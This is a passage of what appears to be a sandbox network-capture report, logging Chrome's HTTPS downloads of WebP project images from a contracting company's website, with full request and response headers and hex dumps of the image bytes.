                                              Data Ascii: u[w'm$Cf:[8o@WVQEi%GxQ/AZi;4M2^=uLJD_NK~Qi,LN'Co+jD}2bhH<[?V&~U0Xq\~N=8CtFjqEo>+<WT6}#j"]eMk(G
                                              2024-09-27 06:20:19 UTC8000INData Raw: f2 97 dd 03 59 b0 fe 76 06 96 55 55 9c 24 b1 52 1d 67 dc 02 18 72 ac 5d ed 34 50 33 89 13 18 52 bf c5 a9 3e 5c 54 da c4 e4 bb 08 be 72 90 1a f1 9b e1 16 0c 2f 5c 08 b1 ca 31 4e b2 70 e2 85 b9 43 d6 bb 22 f0 96 f0 d8 6e c7 d6 2d fe 6b 40 50 9e 18 1e 29 cd 19 1c 3a 38 61 a9 e2 56 1d bd 27 c4 d8 9e 61 40 d7 87 f3 ff b6 88 1c 32 67 31 77 4d 3c ba 0b 53 63 e9 c0 b3 f9 70 b7 f5 3c 00 08 c3 10 b8 76 b0 8f f4 33 a5 aa 2c 91 bc 57 2f 3f 48 d6 25 cb 55 78 48 3d 01 4a 8f 5e 4a 0f 9c 49 2c 31 4f 76 00 5a 72 27 45 12 fa 76 78 14 7a c4 11 52 fd fe 97 bb 8d ca 80 8f e3 79 ba d9 f4 d8 0e 2f 10 1d 54 67 12 19 aa 4d 04 24 95 10 91 0c 73 eb 04 7c 49 92 af ca f8 c6 66 cf 01 2a 66 7e db be 39 f3 b8 c0 f6 14 8d db 5c 36 5d 94 f3 86 08 f0 d8 ad 43 25 eb 19 4a e6 da 8d ea b9 3f
                                              Data Ascii: YvUU$Rgr]4P3R>\Tr/\1NpC"n-k@P):8aV'a@2g1wM<Scp<v3,W/?H%UxH=J^JI,1OvZr'EvxzRy/TgM$s|If*f~9\6]C%J?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              116192.168.2.465453173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC724OUTGET /uploads/projects/28/d42724b6981b1026789790a7700c638e.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:58:06 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 53884
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 74 d2 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 d2 00 00 90 35 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 53 a9 26 2f 30 a4 15 59 c2 10 1d 09 65 6e 73 e3 5b ff 99 c6 cb f5 ff ac ef aa c2 ff b1 e6 4d ff 47 7a f8 f7 f5 fe 5e ff ba fd b4 dc cc d1 5f e2 de 60 1e 8d fc 7f 7f 53 11 d2 e9 31 16 02 0b aa fc cf 1b 0a 7f e9 3c fe 1f 9b 7f f0 76 ed a7 dd 68 cc d7 d5 cf 6b 7e c7 f9 5f dd ef 19 fd a9 7a ef a7 cf a1 8c de bc 63 2f 7f 7b fe bb ce 07 fc df db ef 7a 1f d5 7f c3 7f de fc ff fa 0f fe cd fe 4b d5 5f fd ef dc cf 7f df d5 bf f0 7a 9d fe 93 fe b7 f7 1f de 4b ff 47 ee 5f bd 2f f5 1e a1 df d7 3f d6 f5 c2 7f 7e f5 2c fd cc f5 a0 ff df fb 97 f1 3b fd d7 ff 17 ee 8f b7 36 a9 df db 3f f6 f9 de fa c7 f9 fe 06 fe 8d d8
                                              Data Ascii: RIFFtWEBPVP8XVP8 5*>pS&/0Yens[MGz^_`S1<vhk~_zc/{zK_zKG_/?~,;6?
                                              2024-09-27 06:20:20 UTC8000INData Raw: a5 3d a6 55 d9 d3 99 8c b2 46 62 d4 53 39 09 dd 97 27 10 9f 86 3e 8a ab 42 42 90 66 e3 71 43 93 d4 89 31 58 de 03 c5 5f b0 db 5d 34 86 ac fd e7 ea 4b b1 a4 28 c9 c6 96 99 a4 45 ae 6a ac f0 6b 49 37 90 70 e6 2e 1a 65 15 f3 fd 6b 90 ff a5 f7 ea 1b 59 51 9f 46 f8 f4 56 81 86 c4 39 9f b6 89 6d 5b 22 e0 71 d5 96 4a 58 14 9e 1f 6c 57 a2 3c 05 42 cb 05 1d f8 9a 2d 8a 61 4e fa c7 a9 f8 db ce 21 12 ee f1 2d c2 b4 eb d6 7c 86 43 2e 4c e5 ee e1 4f 32 b7 57 7a 4f 95 1f 5e d4 69 7a e2 ee 01 7c f1 0d f1 8b 93 6f 13 59 85 f7 c1 d7 df f2 79 60 99 6f 52 58 5f 3a f4 85 f5 2f 2c 11 29 46 fb 52 7b 86 e4 f2 20 f9 ff 67 15 70 94 11 f4 a3 36 54 fb b3 fe 86 dc ad 10 57 fe ba b5 ac c2 13 87 46 6e c9 73 73 6d b6 bf fd 32 5a 61 9f af bd 37 eb f5 0f d5 ac 6d a8 06 f1 43 ae c2 49 ce
                                              Data Ascii: =UFbS9'>BBfqC1X_]4K(EjkI7p.ekYQFV9m["qJXlW<B-aN!-|C.LO2WzO^iz|oYy`oRX_:/,)FR{ gp6TWFnssm2Za7mCI
                                              2024-09-27 06:20:20 UTC8000INData Raw: 92 79 a1 e0 76 bd ff 35 79 5f 8c c7 dd f5 d4 3c f3 39 f1 66 8a e3 da ad b6 05 93 00 80 3e 8f e8 ff a9 8c 43 ab 2f d1 65 20 1e 8e 6d f3 f7 66 3b 7b 5d af 68 98 d9 a3 4b d2 98 e5 43 e5 56 c7 3f 5d e9 2d 23 71 f5 56 83 f6 5b 84 4e c0 f2 4c cf a7 40 39 25 d1 2d d6 81 3e f1 da d5 3b 35 d9 ac 6e 11 4b d6 89 0a 51 1b d2 4b c2 46 42 62 fa 32 9c 95 9d f3 ce a5 4b 6e 5c 31 c5 9e 8b c6 e0 f9 12 d2 11 f7 fd af 19 86 5b fb 6b 44 d7 4e 2f b4 9b 3d f6 7c 5a 7f 72 37 d1 6c e8 48 07 96 14 7e 97 6b 27 b5 b2 6a c2 5d 60 05 f8 44 d2 5e 2b 9c 89 ed 94 b8 4f 5f 75 9b 1f 78 d0 6a 57 50 15 41 09 7b 8d aa 94 b0 48 0d 95 a4 9a 48 a7 1e 12 34 37 6b 26 86 3b 81 87 b4 b9 d4 1c b4 a9 a4 64 a2 21 f2 42 dc 89 7f a7 5f bb 36 d0 da 90 29 5a ed 5e 22 6d f7 04 3f 6a 94 57 07 b9 ff 7c 32 2f
                                              Data Ascii: yv5y_<9f>C/e mf;{]hKCV?]-#qV[NL@9%->;5nKQKFBb2Kn\1[kDN/=|Zr7lH~k'j]`D^+O_uxjWPA{HH47k&;d!B_6)Z^"m?jW|2/
                                              2024-09-27 06:20:20 UTC8000INData Raw: fa 80 13 89 c9 a8 a1 10 45 a5 d7 3b e8 bb aa 27 7e 02 05 4f 02 01 e7 30 b2 ad 87 89 24 e8 19 3f f6 93 3e 12 5d cf ea ee 43 f4 47 92 10 83 85 d4 40 75 b3 99 4f 91 c5 f9 fb d7 d3 c5 4f cb fc b9 d4 d1 b0 c1 7b 74 6a 25 db 08 73 40 d4 5b f7 ce 8c 74 28 5c 4d 05 12 d3 9e 16 c7 65 50 ee 01 5b cc 6e a4 41 71 4a 30 52 4c 20 f6 e7 4b e1 c5 f1 0e 5e 32 31 6d c0 f5 22 ae f3 da 12 95 5f ba 04 75 80 2c 79 78 8b 73 6d ba ab 22 34 1c 64 bf 06 0b 3c a8 e5 4e 18 68 2b 37 55 77 4d 32 4d 1f 20 08 e9 36 68 cd cc 85 c6 45 96 db 06 42 4c 29 99 b2 b6 dd e0 bd b6 e1 b8 5b 9c 52 fa f3 48 79 16 89 a5 ae d3 80 d2 0a cc f8 58 4b a5 57 f8 39 1b 91 9e 94 d3 bd a3 ca 94 ee 0f 55 88 61 35 c9 73 4e cb 61 6c a3 5f 2a 27 63 72 fc e0 a7 3a 4b 15 6a d7 45 da 26 74 84 d8 14 79 da d5 64 30 2e
                                              Data Ascii: E;'~O0$?>]CG@uOO{tj%s@[t(\MeP[nAqJ0RL K^21m"_u,yxsm"4d<Nh+7UwM2M 6hEBL)[RHyXKW9Ua5sNal_*'cr:KjE&tyd0.
                                              2024-09-27 06:20:20 UTC8000INData Raw: 79 67 d7 d7 2c 7e 7f b8 9c 02 76 23 92 10 fc 98 fa ba 16 4e e2 4c d4 58 6a b2 d0 92 ec f8 42 55 da 10 67 03 28 96 4f 86 7d d6 53 c0 f4 28 1d a4 99 94 ad ae 8e 9d 3d 27 19 67 36 c6 20 a2 05 88 c0 d1 59 06 60 45 7c 6a b3 88 83 e3 b4 29 96 3b f4 38 6b 84 4e 8c 37 02 7f 26 52 e5 64 01 de 7a 2c 57 32 58 7a 6c 2c 64 3a ab 91 da 3f 83 e6 92 1b 2c b0 19 8b 96 bd 11 6d 3b 95 59 23 02 58 e0 4c 03 2b 3f 21 40 db 4e 3e c8 d5 df ba f3 6f c1 8e 3a 12 d6 40 70 03 18 1e 5a ce a0 ec 98 56 58 a8 73 a8 a9 8b 55 76 53 2f 67 3f d8 59 dd fb 6a b4 a6 36 d8 3a 77 7f 3a f9 d5 2c c8 c7 d1 91 fe 3d 1e 6c ca 5b 1a 59 29 73 3d 42 f0 24 d8 47 7b 6e d9 9c b1 5e 51 d8 31 3b d2 15 03 50 76 3f cd 63 23 0f 32 84 17 02 3b ce be bc db cd 2b a0 8a 4b ae 5a 18 7b dc 11 5b a8 2d 03 1e 65 46 3f
                                              Data Ascii: yg,~v#NLXjBUg(O}S(='g6 Y`E|j);8kN7&Rdz,W2Xzl,d:?,m;Y#XL+?!@N>o:@pZVXsUvS/g?Yj6:w:,=l[Y)s=B$G{n^Q1;Pv?c#2;+KZ{[-eF?
                                              2024-09-27 06:20:20 UTC8000INData Raw: 63 d7 48 2c 1d 75 00 9a 17 91 54 db b1 56 d8 98 1e 73 75 13 28 43 28 ad e7 20 99 16 ba cc 29 45 9c eb 84 26 5c 96 27 7e ee 61 7d 02 07 e2 ae ba 05 6a 6e 69 0f 6a 5d 15 ee 66 f4 7c ed 12 4d 92 a8 9a f3 a5 fd 33 23 63 2c 3b d9 c7 dd 96 4f 71 a8 26 6b 11 72 cb af a9 e9 78 b1 89 1b bb 73 56 9b 1d 72 d3 2b 6a a3 38 da dd 35 bc c1 2a 51 89 85 ff fd 68 a6 6d 0d 56 9a 2a c3 ca b9 46 95 fa f9 66 b5 1c 70 ef 25 a3 bc e8 02 2c 89 c3 01 58 ce 42 cd e9 7f 6e 80 32 26 e1 09 71 80 6f 24 55 ad 45 b1 3a d3 b7 dd 68 0e 26 8f a7 cd 60 69 51 88 57 5d bf eb 00 4b 9e 31 54 ea ab 1e 81 96 7d 95 e8 0b 95 ea 4e aa 86 bc 5a 5b 7f ff 74 17 9d a7 6c 5f aa 4f 67 e0 aa e0 c1 9e 65 6b f6 62 14 fd db 2a 20 5d 93 17 06 83 52 81 64 9f b9 2b 8a 47 6a b3 06 55 eb 13 b3 43 37 5c c2 5c fa b2
                                              Data Ascii: cH,uTVsu(C( )E&\'~a}jnij]f|M3#c,;Oq&krxsVr+j85*QhmV*Ffp%,XBn2&qo$UE:h&`iQW]K1T}NZ[tl_Ogekb* ]Rd+GjUC7\\
                                              2024-09-27 06:20:20 UTC5953INData Raw: 57 27 b6 aa 7f fc f7 c1 db 73 5b 67 d0 f8 a0 ca ae cb 2b 3c 70 07 45 7e 2d 2f 4c 2a bf 8d b3 fd be 09 e3 ba ff 51 46 f7 7c c1 1d b8 ae e4 d5 e0 4c 72 b9 78 b6 ea a7 e8 fd 23 6c cd eb cb 6d b1 62 66 62 57 9d 96 88 4f d7 7e b4 c8 30 c1 2a e7 f1 67 23 5e 93 e9 ed 8c 45 55 5b a1 1b 7d ed 77 3d e1 a7 6a 27 56 4d 3b 3c 28 3c 55 53 9d 38 6c 4b 4a 9a 95 2c a7 81 c7 0b 7b ac ce a8 ef 8f ba 5f 41 80 75 07 54 5f fa 01 80 da 40 9e 3d 0f 68 2d b0 1a c2 bb a7 75 8d 7e f0 ed 9b 9d 4d 43 20 25 ae a5 02 1a 3c 44 43 78 77 30 c8 83 6b f2 3e 32 58 64 cf 45 bf eb f6 ee e9 65 d1 b1 c1 d1 e4 37 be 90 ba 0b 2b c6 9f af 84 c8 81 e6 c0 95 5d 17 ef ba 70 85 7a a1 40 fb 0b a6 ea 34 3f 18 f2 66 64 4b 1d b6 38 12 16 ff 74 3a 19 d4 83 83 78 a9 ae f6 04 b3 44 46 77 c8 ec c5 b0 ec c1 e6
                                              Data Ascii: W's[g+<pE~-/L*QF|Lrx#lmbfbWO~0*g#^EU[}w=j'VM;<(<US8lKJ,{_AuT_@=h-u~MC %<DCxw0k>2XdEe7+]pz@4?fdK8t:xDFw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              117192.168.2.465452173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC724OUTGET /uploads/projects/26/a417b2689f08829d773cb2abc660a2f4.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:55:50 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 32160
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 98 7d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 24 7d 00 00 10 83 03 9d 01 2a cf 04 a3 03 3e e9 72 b3 54 29 2c 2a b1 22 92 09 5a 20 1d 09 67 4b 96 c9 fe f7 9a 02 aa df b9 e3 eb d3 b4 ef 7f 62 e0 c9 a8 fd 77 12 3d 37 bf 53 3c a6 eb 28 df 73 a4 0f 3a 94 5a 65 b3 88 c7 c7 70 c5 2f 9d 35 6c 87 b0 b7 24 f1 2d d4 b7 46 ae f4 cf 1f bf 6c de fa 3e fd 39 be 9b fb 5f a2 bf 38 9f 3e fd e0 0a 86 ff 9d 7f f0 f3 f3 f5 5f f5 bf fb 78 ff f9 e7 e8 7e ec bd d5 f0 d7 f6 fd df bb 72 76 a3 fb e7 84 5f 91 74 3f ba 2d 40 fd e8 f3 dd fb 73 f7 3d 35 f8 89 fd 97 a2 67 ff af 42 ff b4 7f ea f5 75 ff 9a 25 f4 0f 68 e3 c2 fb 67 9c 26 50 da b5 59 b1 19 40 bc 2b ef 4f 79 a4 85 e2 50 97 38 b0 a2 aa 3c ba 27 34 6d c3 20 63 8b 86 0b b1
                                              Data Ascii: RIFF}WEBPVP8XVP8 $}*>rT),*"Z gKbw=7S<(s:Zep/5l$-Fl>9_8>_x~rv_t?-@s=5gBu%hg&PY@+OyP8<'4m c
                                              2024-09-27 06:20:20 UTC8000INData Raw: 01 2b 6e 14 22 f4 66 03 38 d1 a0 40 18 9a a3 1b f7 a0 71 eb e0 d3 98 05 46 19 39 8b 4f f3 06 2d 49 f8 60 fb a5 ae 0c e2 01 4a f8 79 c8 ab c3 e5 bf 44 f1 b9 db fb a0 f3 e5 1b f3 0d c4 45 95 e0 71 43 0a 3b 15 7f d1 dc e9 a6 4e 8f e1 22 0b 72 a6 6b 19 2d 74 72 f2 6a 1a 40 ea fa 76 d8 6f 20 76 6b ad f7 56 63 06 7e 6d d7 7b d8 c9 cd d3 44 0d f4 f0 78 42 16 47 c1 1c 2f 85 bc 1a 13 07 8e ee 6c 49 06 75 68 fe e0 9a 8b cf 71 77 e1 6a 67 5b cb a1 9b 46 49 8b 45 f0 23 d0 cb 4c 2d ab 67 83 1a 1b 40 aa a4 fb 23 32 19 70 01 f8 7c 3e df 85 d4 ab 7e 4f a8 e7 66 8d 73 44 77 40 4b b6 b5 f0 89 3c fc 2a ba 05 a7 68 dd da 0d 53 c9 12 1f 55 cb 8e f7 c9 02 8e 2f ed 64 8d 64 a0 53 02 25 32 1f ed 22 9c 9e bd 38 7b 90 c0 c8 5f 48 f2 1c 7c bd ac 50 8f 41 c7 ce 1d 0b 6f 70 f9 b8 6c
                                              Data Ascii: +n"f8@qF9O-I`JyDEqC;N"rk-trj@vo vkVc~m{DxBG/lIuhqwjg[FIE#L-g@#2p|>~OfsDw@K<*hSU/ddS%2"8{_H|PAopl
                                              2024-09-27 06:20:20 UTC8000INData Raw: 54 75 df 05 4b 6b 9c 6a 0f 39 2c 71 04 91 52 eb 41 db 34 58 70 ac a2 c2 dd 78 07 4d a0 05 51 48 b7 bd c2 c0 f3 0b b2 ad ad 51 e9 26 7e e2 1a f4 b0 71 d1 71 6e 07 a5 d0 ac 12 9e cc 4f 0c 86 d0 b7 56 44 6c 98 27 01 d9 6a 3a d3 a4 50 d8 c9 cf e7 62 87 07 cb 08 ec 58 1f f6 8a b5 e3 e5 04 97 7c 74 91 71 cc 30 bc 66 bc 30 9d 55 b6 2f 27 e4 48 09 a1 94 a0 96 31 c8 5b ce 16 1c d8 65 ae e0 0a ba e3 c5 d0 92 b9 cd f3 70 2a b2 62 3e 28 58 f3 a5 9a 56 79 fe 5f 59 9a 0e 16 81 b4 74 83 c0 93 8d 5e 17 bf a9 36 00 51 27 7d 6b ff 61 11 69 54 21 d2 0b 64 47 04 ca 69 94 14 91 27 11 28 69 a3 26 cc cf f4 73 dd a1 36 ea e4 aa ea 1c e9 7f 2c e6 83 d0 4e 77 3b d4 1f 6f 98 49 ec b8 0a 7e 9e 52 dd 45 64 d2 97 90 c7 4b 3e 9a 17 99 4b 8e 5f 79 c5 0a fc 70 2c 7e 49 e9 03 8b 9e 74 b3
                                              Data Ascii: TuKkj9,qRA4XpxMQHQ&~qqnOVDl'j:PbX|tq0f0U/'H1[ep*b>(XVy_Yt^6Q'}kaiT!dGi'(i&s6,Nw;oI~REdK>K_yp,~It
                                              2024-09-27 06:20:20 UTC8000INData Raw: 30 61 9f 42 88 12 6a d1 a3 f6 4f 33 8f 6e 9f eb 9d ac 11 e5 c6 ce 7a 08 b5 7d fd 27 7f 81 9b b4 ad e5 f3 b7 7f 6c 50 04 d9 bc ab 0a a5 eb cd 89 a8 80 57 9b d8 0e 79 55 1b 9a f8 a7 ff 81 cd ef 7a 29 e6 9f 67 1c 28 01 d4 45 06 34 23 ca 16 56 4e 89 ed 3b 42 e1 78 fb bd f6 ea 26 60 8f 1b 41 83 11 84 dc 95 ea f4 2e a7 d0 62 6d 26 95 23 53 98 c9 b1 19 fe c8 84 ae 6f de 81 76 86 85 5e b6 d5 68 d6 cb 7d 4d 8e c4 5b c0 dc 87 70 bb 2b 21 7e 98 58 2f 79 a3 9f ef 74 a6 6d 66 b9 99 fc 9f ad 81 f5 5a 03 3e 29 05 4f b6 b1 d2 21 4c 36 80 c4 f2 0c fa 7a c8 ef 9a cb 44 0a 2e 91 4e 1a 29 00 fc dd 78 85 23 02 85 69 ae 9a c0 e5 1f 22 0f 12 1c 88 73 38 1a 2c b6 6a 63 20 40 46 b1 cf 6c ac f5 41 32 b7 2c 6d c7 9a 44 2a 04 af fa b0 10 52 08 fe 3d f0 09 bf 9b 1d ef 6d 7e 4b 5a 94
                                              Data Ascii: 0aBjO3nz}'lPWyUz)g(E4#VN;Bx&`A.bm&#Sov^h}M[p+!~X/ytmfZ>)O!L6zD.N)x#i"s8,jc @FlA2,mD*R=m~KZ
                                              2024-09-27 06:20:20 UTC229INData Raw: 8c 94 e9 f0 47 ac 67 d4 3f 9c b9 cf 7b f0 3f 19 b1 8b cd a8 e1 ec 8a a5 29 86 12 e8 cd 5d 87 7a 4d d5 90 6e 2e 19 db 24 36 9d 4f 83 39 1b 18 03 60 7d 87 4c 81 20 8e 5c 3b e4 38 45 b5 ed 5c 0b 3f db 3f c4 2b 51 a2 46 57 1c 9e b8 27 0f 0b 34 2a 90 3d 92 7c 33 fe 63 27 d2 15 50 af a7 48 a1 c4 d2 21 48 3e 6a 34 84 d4 38 1d 3c 56 71 09 3e 64 09 69 78 ba 50 1c 50 d8 a1 e2 cd b5 85 37 9d f7 04 e9 9a 13 0f 44 45 38 91 91 55 7b 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: Gg?{?)]zMn.$6O9`}L \;8E\??+QFW'4*=|3c'PH!H>j48<Vq>dixPP7DE8U{PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              118192.168.2.465456173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC465OUTGET /uploads/projects/16/f2e9aef4e6dba3f5ab1fba99f80ec53b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:51:43 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 32144
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 88 7d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 14 7d 00 00 d0 9a 03 9d 01 2a cf 04 a3 03 3e e9 70 b2 54 29 26 34 b9 a2 12 c9 f3 30 1d 09 67 6e dc 8a dd 1e ca c6 8d ef 00 b5 e5 f5 a0 03 1c 56 6d 7a 44 78 47 3d 6f 28 bf e2 b3 7c 0e ba f8 77 fc e3 08 13 0c 5a 79 ab 7e 69 de 79 9a e7 44 fd 11 ff d6 a0 14 6e ad ac 37 f5 06 76 76 32 f5 1b fd d3 fc 5f b0 37 43 df 31 1f b7 7e a9 7e 92 ba 24 fd 66 3d 07 ba 62 7f b8 64 a4 fd 3f ff 2f 9e 7f a2 7f 83 e1 2f e7 fe f6 9b a4 61 7f eb bc 1f fe df fc f3 3a 9d c5 fe c7 fc bf 25 dc 8a f9 79 42 3f a8 79 67 c9 7f a1 ce 4f df b7 f4 47 ff e9 e9 df ee cf 4c 11 88 8f e9 c7 d9 85 f0 54 3d 4c a8 64 20 25 43 a9 e4 70 72 8d 5b 59 bb 0b e1 99 b8 9a 28 aa 3c 9b 04 ee 52 c1 fc 83 ac
                                              Data Ascii: RIFF}WEBPVP8XVP8 }*>pT)&40gnVmzDxG=o(|wZy~iyDn7vv2_7C1~~$f=bd?//a:%yB?ygOGLT=Ld %Cpr[Y(<R
                                              2024-09-27 06:20:20 UTC8000INData Raw: f6 76 8d 8e 6d 67 f4 15 88 b3 b2 b4 05 75 c4 44 86 84 09 40 00 0d 02 b3 df d5 1e fd 44 d3 08 05 c1 7c 16 28 e4 4d 90 0f 6f 06 b0 2d e1 fc 6e c0 9d 6e e6 3d cc 49 bc 49 95 f0 42 20 cb ba 33 f6 ea b3 4f cc 0d 32 fe 0f 59 81 ed 33 a5 d6 43 6a 30 b5 a3 4e a3 ad 6b 80 37 00 ac f5 ef f9 ec 51 b0 b4 a1 5a f7 45 bb 1e fe 26 08 00 02 bc 70 ce 5c 0d 3f 62 35 be 55 48 24 da 7b b1 03 72 c2 5d c6 19 c4 9b 0b 98 a9 20 86 e9 1e 2b d9 a8 ef 1e c5 49 de 76 05 f8 f3 0d d9 08 d4 df a4 59 8f c7 bc bf 09 a0 de 77 c6 18 d4 4b 5c cf e0 16 95 6a 76 01 02 e5 78 61 74 cc 14 e0 cb 28 3d 34 2a c1 eb 0b 4e f5 3a 90 17 b9 cb a1 35 e4 15 02 c7 08 47 b0 5b cd 29 39 7d 2b 47 cf 33 94 fe 94 7c f4 05 bf 3d ea 7d 39 6b 11 2f 8e c6 02 07 14 7e b8 18 2a 83 d4 7d d1 44 b3 4b 84 8a 67 c2 ed e9
                                              Data Ascii: vmguD@D|(Mo-nn=IIB 3O2Y3Cj0Nk7QZE&p\?b5UH${r] +IvYwK\jvxat(=4*N:5G[)9}+G3|=}9k/~*}DKg
                                              2024-09-27 06:20:20 UTC8000INData Raw: 7b 72 17 ef 00 9d 09 b0 41 b3 c4 ba 1f 58 47 f3 be b4 84 cb e3 5d 1a 71 bf 34 a1 ca f9 65 26 57 a0 29 08 e9 05 c9 e9 92 f7 8f 29 34 83 17 43 d4 10 a0 16 bd 0f 76 0c e6 38 b1 b8 1e 8f 25 47 48 fd cb b1 e9 ad 39 17 a3 ce 1b a6 3d bf b9 6c 32 19 fe 30 12 e9 5c 92 61 64 44 6f 5a 4b 54 3f c2 a1 ac 53 58 a9 ef ba 05 ab 3d a8 06 ac 5f f4 d1 cd e8 0a d6 e5 2f bc 9c a8 ea 03 67 1e e3 34 35 5c 4b e3 25 5f 28 7c f0 ba df 00 97 fd f9 39 2f 7a f0 28 7a 19 2a 68 d3 42 e0 f5 fd 72 c7 05 fa 61 a5 80 0c 8a 93 89 03 ee 02 0b 56 cc 97 03 70 68 ad e1 94 31 c0 ad b6 7e 1d a1 fe 5a 4c b6 79 42 c1 e4 0b 53 a0 f6 bf 38 f7 d8 58 85 91 1f 7d c2 58 f3 7d 81 96 f6 58 6a ef 13 91 13 b9 20 53 b9 24 b1 01 77 a3 58 86 0f 1e dd 41 25 28 21 de 93 97 27 10 d1 cf 13 4b 56 ea b2 00 6d 36 3e
                                              Data Ascii: {rAXG]q4e&W))4Cv8%GH9=l20\adDoZKT?SX=_/g45\K%_(|9/z(z*hBraVph1~ZLyBS8X}X}Xj S$wXA%(!'KVm6>
                                              2024-09-27 06:20:20 UTC8000INData Raw: 51 8a 0d 42 ee 9e 2a af 7e d3 8c 9b 46 37 83 c9 50 ce 4a ed bb 39 75 13 3f fb 58 5f 15 d1 b2 83 b0 53 8d 4e 69 b6 fe 1e b4 26 f0 3d ca 02 6a 02 b6 3e 70 1b 1e 5b ac ef a2 13 06 4c ba b3 e9 f7 a7 d0 76 ce dd c8 84 c8 8d d5 6f 18 57 09 92 2e 89 67 76 3a 41 f3 06 b7 a2 f0 53 ee bd 8f b2 21 25 bf 6d 11 28 52 b9 93 66 34 bb 46 e2 97 70 52 e2 71 90 2f 0c 02 23 c3 81 01 8d 8e 13 05 ab bc 0d 08 7f 7a 30 68 b1 a3 d3 d4 71 51 44 67 7f 5b 37 8a 9e 6e 7c 69 45 60 a8 a8 65 65 ab 82 7f a4 77 03 2a 2c 38 ea e5 58 84 e5 06 38 ed e5 f6 f5 d4 de 72 c7 4f 4b 83 c0 46 01 46 f8 cc 3d 77 53 ba 35 ff e0 9f 26 49 1e e5 db e4 cd bb 70 9e d0 c7 40 24 b9 a6 2d 6a 14 43 e9 49 28 2c 2a 9d 42 c7 e2 76 6a 1e 18 bd f5 9d fd cb 20 16 24 c1 52 76 5a 3d d4 25 a8 a2 73 5c 22 05 cc 0e eb e8
